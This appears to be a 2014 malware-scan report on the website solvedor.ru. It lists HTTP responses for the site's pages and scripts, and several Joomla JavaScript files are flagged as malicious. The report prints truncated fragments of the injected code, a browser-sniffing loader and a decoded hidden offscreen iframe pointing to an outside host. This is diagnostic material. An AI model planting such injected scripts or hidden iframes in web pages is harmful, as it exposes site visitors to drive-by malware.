Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=solvedor.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://solvedor.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 07:53:49 GMT Location: http://www.solvedor.ru/ Server: Jino.ru/mod_pizza Content-Length: 231 Content-Type: text/html; charset=UTF-8 | clean |
http://www.solvedor.ru/ | 200 OK Content-Length: 33699 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.shelis.ru <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-ru" lang="ru-ru" dir="ltr" > <head> <base href="http://www.solvedor.ru/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name ...[4321 bytes skipped]... | ||
http://www.solvedor.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2 | 200 OK Content-Length: 28919 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& }}, subscribe: function(o,g){return this.ajax('JCommentsSubscribe',arguments);}, unsubscribe: function(o,g){return this.ajax('JCommentsUnsubscribe',arguments);}, updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}}, go: function(l){window.open(l);return;} };}; Antivirus reports:
| ||
http://solvedor.ru/components/com_jcomments/libraries/joomlatune/ajax.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 07:53:50 GMT Location: http://www.solvedor.ru/components/com_jcomments/libraries/joomlatune/ajax.js Server: Jino.ru/mod_pizza Content-Length: 284 Content-Type: text/html; charset=UTF-8 | clean |
http://www.solvedor.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 6079 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& switch(cmd) { case 'as': if(obj){eval("obj."+property+"=data;");} break; case 'al': if(data){alert(data);} break; case 'js': if(data){eval(data);} break; default: this.error('Unknown command: ' + cmd);break; } } delete result; delete cmd; delete id; delete property; delete data; delete obj; return true; }; this.error = function(){}; } var jtajax = new jtAJAX(); } Decoded script: <iframe src="http://qersmile.jual-bajumurah.com/gweyrtuytgjhfdg17.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe> Antivirus reports:
| ||
http://solvedor.ru/media/system/js/caption.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 07:53:51 GMT Location: http://www.solvedor.ru/media/system/js/caption.js Server: Jino.ru/mod_pizza Content-Length: 257 Content-Type: text/html; charset=UTF-8 | clean |
http://www.solvedor.ru/media/system/js/caption.js | 200 OK Content-Length: 4064 Content-Type: application/javascript | clean |
http://solvedor.ru/templates/yoo_intro/lib/js/addons/base.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 07:53:51 GMT Location: http://www.solvedor.ru/templates/yoo_intro/lib/js/addons/base.js Server: Jino.ru/mod_pizza Content-Length: 272 Content-Type: text/html; charset=UTF-8 | clean |
http://www.solvedor.ru/templates/yoo_intro/lib/js/addons/base.js | 200 OK Content-Length: 3872 Content-Type: application/javascript | clean |
http://solvedor.ru/templates/yoo_intro/lib/js/addons/accordionmenu.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 07:53:52 GMT Location: http://www.solvedor.ru/templates/yoo_intro/lib/js/addons/accordionmenu.js Server: Jino.ru/mod_pizza Content-Length: 281 Content-Type: text/html; charset=UTF-8 | clean |
http://www.solvedor.ru/templates/yoo_intro/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 3452 Content-Type: application/javascript | clean |
http://solvedor.ru/templates/yoo_intro/lib/js/addons/fancymenu.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 07:53:52 GMT Location: http://www.solvedor.ru/templates/yoo_intro/lib/js/addons/fancymenu.js Server: Jino.ru/mod_pizza Content-Length: 277 Content-Type: text/html; charset=UTF-8 | clean |
http://www.solvedor.ru/templates/yoo_intro/lib/js/addons/fancymenu.js | 200 OK Content-Length: 4768 Content-Type: application/javascript | clean |
http://solvedor.ru/templates/yoo_intro/lib/js/addons/dropdownmenu.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 07:53:52 GMT Location: http://www.solvedor.ru/templates/yoo_intro/lib/js/addons/dropdownmenu.js Server: Jino.ru/mod_pizza Content-Length: 280 Content-Type: text/html; charset=UTF-8 | clean |
http://www.solvedor.ru/templates/yoo_intro/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 4925 Content-Type: application/javascript | clean |
http://solvedor.ru/templates/yoo_intro/lib/js/template.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 07:53:52 GMT Location: http://www.solvedor.ru/templates/yoo_intro/lib/js/template.js Server: Jino.ru/mod_pizza Content-Length: 269 Content-Type: text/html; charset=UTF-8 | clean |
http://www.solvedor.ru/templates/yoo_intro/lib/js/template.js | 200 OK Content-Length: 5056 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& YOOBase.matchHeight('div.topbox div.deepest', 20); YOOBase.matchHeight('div.bottombox div.deepest', 20); YOOBase.matchHeight('div.maintopbox div.deepest', 20); YOOBase.matchHeight('div.mainbottombox div.deepest', 20); YOOBase.matchHeight('div.contenttopbox div.deepest', 20); YOOBase.matchHeight('div.contentbottombox div.deepest', 20); } } }; window.addEvent('domready', YOOTemplate.start);); Antivirus reports:
| ||
http://www.solvedor.ru/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 41040 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& Antivirus reports:
| ||
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12388 Content-Type: application/javascript | clean |
http://solvedor.ru//mc.yandex.ru/metrika/watch.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 07:53:53 GMT Location: http://www.solvedor.ru/mc.yandex.ru/metrika/watch.js/ Server: Jino.ru/mod_pizza Content-Length: 261 Content-Type: text/html; charset=UTF-8 | clean |
http://www.solvedor.ru/mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 20723 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21347 Content-Type: text/javascript | clean |
http://solvedor.ru/novosti/blog | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 10 Sep 2014 07:53:54 GMT Location: http://www.solvedor.ru/novosti/blog Server: Jino.ru/mod_pizza Content-Length: 243 Content-Type: text/html; charset=UTF-8 | clean |
http://www.solvedor.ru/novosti/blog | 200 OK Content-Length: 30349 Content-Type: text/html | clean |
http://www.solvedor.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 20723 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: solvedor.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 10 Sep 2014 07:53:49 GMT
Location: http://www.solvedor.ru/
Server: Jino.ru/mod_pizza
Content-Length: 231
Content-Type: text/html; charset=UTF-8
...231 bytes of data.
GET / HTTP/1.1
Host: solvedor.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 10 Sep 2014 07:53:49 GMT
Location: http://www.solvedor.ru/
Server: Jino.ru/mod_pizza
Content-Length: 231
Content-Type: text/html; charset=UTF-8
...231 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: solvedor.ru
Referer: http://www.google.com/search?q=solvedor.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: solvedor.ru
Referer: http://www.google.com/search?q=solvedor.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.